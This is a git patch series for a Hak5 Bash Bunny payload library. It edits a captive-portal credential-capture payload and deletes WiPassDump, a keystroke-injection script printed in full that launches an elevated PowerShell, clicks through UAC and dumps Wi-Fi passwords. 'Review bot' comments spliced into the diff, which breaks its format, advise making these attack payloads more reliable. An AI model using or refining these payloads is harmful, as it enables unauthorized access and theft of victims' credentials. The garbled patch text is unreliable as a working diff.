From 50d8bc08269b39cf0fc72f67ef7b1411c2915210 Mon Sep 17 00:00:00 2001
From: JayDee Raymaker
Date: Mon, 20 Mar 2017 20:51:10 +0100
Subject: [PATCH 1/4] Fixed UAC bypass

ALT o does nothing. Changed it to ALT y (means yes)
---
 payloads/library/WiPassDump/payload.txt | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/payloads/library/WiPassDump/payload.txt b/payloads/library/WiPassDump/payload.txt
index c141d9480..ea51416d5 100644
--- a/payloads/library/WiPassDump/payload.txt
+++ b/payloads/library/WiPassDump/payload.txt
@@ -33,7 +33,7 @@ Q ENTER
 
 # Bypass UAC
 Q DELAY 3000
-Q ALT o
+Q ALT y
 Q ENTER
 Q DELAY 500
 

From a18b22d95f571a23d6b14806e5df162ee9b297cf Mon Sep 17 00:00:00 2001
From: JayDee Raymaker
Date: Tue, 21 Mar 2017 02:32:03 +0100
Subject: [PATCH 2/4] Commented out URL

The URL was a part of the script. Commented it out
---
 payloads/library/Captiveportal/payload.txt | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/payloads/library/Captiveportal/payload.txt b/payloads/library/Captiveportal/payload.txt
index c044eeace..c41834420 100644
--- a/payloads/library/Captiveportal/payload.txt
+++ b/payloads/library/Captiveportal/payload.txt
@@ -5,7 +5,7 @@
 # Version: 1.0
 
 # Usage of bunny_helpers.sh to avoid problems with find in function startCaptiveportal
-https://forums.hak5.org/index.php?/topic/40237-install-tools/
+# https://forums.hak5.org/index.php?/topic/40237-install-tools/
 
 # Add or remove inputs here
 INPUTS=(username password)

From 15eba6736aabca5e495b36719a3282687677e9ae Mon Sep 17 00:00:00 2001
From: JayDee Raymaker
Date: Tue, 21 Mar 2017 03:42:43 +0100
Subject: [PATCH 3/4] Fix from sebkinne

---
 payloads/library/Captiveportal/payload.txt | 11 +++++------
 1 file changed, 5 insertions(+), 6 deletions(-)

diff --git a/payloads/library/Captiveportal/payload.txt b/payloads/library/Captiveportal/payload.txt
index c41834420..13e8649e3 100644
--- a/payloads/library/Captiveportal/payload.txt
+++ b/payloads/library/Captiveportal/payload.txt
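Review bot: `Q ALT y` assumes that, 3000 ms after the `Start-Process -Verb runAs` line, the window with focus is the UAC consent dialog; for a standard (non-admin) user UAC presents a credential prompt instead, so ALT+y and the following `Q ENTER` dismiss nothing and every later keystroke is typed into whatever window is focused. The "Y" accelerator also depends on the dialog's language, and the same file sets `Q SET_LANGUAGE ca` (visible in its later deletion), so the precondition deserves to be written next to the keystroke: `# UAC consent prompt (admin user, default UAC level): ALT+y = "Yes"; a credential prompt is not handled`. The bare `3000` is a guess about host speed; a comment such as `# UAC prompt appearance delay, tune per target` would make that explicit.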
@@ -2,10 +2,7 @@
 #
 # Title: Captiveportal
 # Author: Sebkinne
-# Version: 1.0
-
-# Usage of bunny_helpers.sh to avoid problems with find in function startCaptiveportal
-# https://forums.hak5.org/index.php?/topic/40237-install-tools/
+# Version: 1.1
 
 # Add or remove inputs here
 INPUTS=(username password)
@@ -18,6 +15,9 @@ ATTACKMODE RNDIS_ETHERNET
 # DO NOT EDIT BELOW THIS LINE #
 ##################################################################
 
+source bunny_helpers.sh
+WORKINGPATH="/root/udisk/payloads/$SWITCH_POSITION"
+
 # Sets up iptable forwarding and filters
 function setupNetworking() {
 echo 1 > /proc/sys/net/ipv4/ip_forward
@@ -30,8 +30,7 @@ function setupNetworking() {
 
 # Find payload directory and execute payload
 function startCaptiveportal() {
-# cd $(dirname $(find /root/udisk/payloads/ -name portal.html))
- cd /root/udisk/payloads/$SWITCH_POSITION
+ cd $WORKINGPATH
 chmod +x captiveportal
 ./captiveportal ${INPUTS[@]}
 }

From 0197135de5cd3122b75ada9509b36fec86f120f9 Mon Sep 17 00:00:00 2001
From: JayDee Raymaker
Date: Fri, 26 May 2017 15:23:17 +0200
Subject: [PATCH 4/4] Delete payload.txt

---
 payloads/library/WiPassDump/payload.txt | 56 -------------------------
 1 file changed, 56 deletions(-)
 delete mode 100644 payloads/library/WiPassDump/payload.txt

diff --git a/payloads/library/WiPassDump/payload.txt b/payloads/library/WiPassDump/payload.txt
deleted file mode 100644
index ea51416d5..000000000
--- a/payloads/library/WiPassDump/payload.txt
+++ /dev/null
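Review bot: `source bunny_helpers.sh` is sourced by bare name with no failure check, and the next line builds `WORKINGPATH` from `$SWITCH_POSITION`, which (per the header comment in the WiPassDump payload deleted later in this series) is the variable that helper provides; if the source fails, the variable is empty and `WORKINGPATH` silently collapses to `/root/udisk/payloads/`, so the rest of the payload operates on the wrong directory. Fail closed at the point of definition: `source bunny_helpers.sh || exit 1` and `WORKINGPATH="/root/udisk/payloads/${SWITCH_POSITION:?SWITCH_POSITION unset}"`. The `setupNetworking` function this hunk opens continues past the hunk's last line.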
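Review bot: `cd $WORKINGPATH` is unquoted and its result is never checked, so when the directory does not exist (or the variable is empty) the function carries on and runs `chmod +x captiveportal` followed by `./captiveportal` in whatever directory the script happened to start in, making executable and running an unrelated file of that name. Guard it with `cd "$WORKINGPATH" || exit 1`, and quote the array expansion on the last line, `./captiveportal "${INPUTS[@]}"`, so an input name containing whitespace stays a single argument.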
@@ -1,56 +0,0 @@
-#!/bin/bash
-#
-# Title: WiPassDump
-# Author: samdeg555
-# Version: 1.0
-# Target: Windows
-#
-# Runs powershell as Administrator
-# Bypasses UAC
-# Dumps cleartext Wi-Fi passwords and infos to the Bash Bunny
-#
-
-LED R 200
-
-# Create directory to dump infos
-mkdir -p /root/udisk/loot/WiPassDump
-
-# Source bunny_helpers.sh to get environment variable SWITCH_POSITION
-source bunny_helpers.sh
-
-# Set language accordingly
-Q SET_LANGUAGE ca
-
-ATTACKMODE HID STORAGE
-
-LED B 200
-
-# Launch powershell as admin
-Q GUI r
-Q DELAY 100
-Q STRING powershell Start-Process powershell -Verb runAs
-Q ENTER
-
-# Bypass UAC
-Q DELAY 3000
-Q ALT y
-Q ENTER
-Q DELAY 500
-
-# Start a.cmd
-Q STRING '.((gwmi win32_volume -f '"'"'label='"''"'BashBunny'"'''"').Name+'"'"'payloads/'
-Q STRING $SWITCH_POSITION
-Q STRING '/a.cmd'"'"')'
-Q ENTER
-
-# Wait for a.cmd to finish and exit
-
-LED R B 500
-
-Q DELAY 3000
-Q STRING exit
-Q ENTER
-
-sync
-
-LED G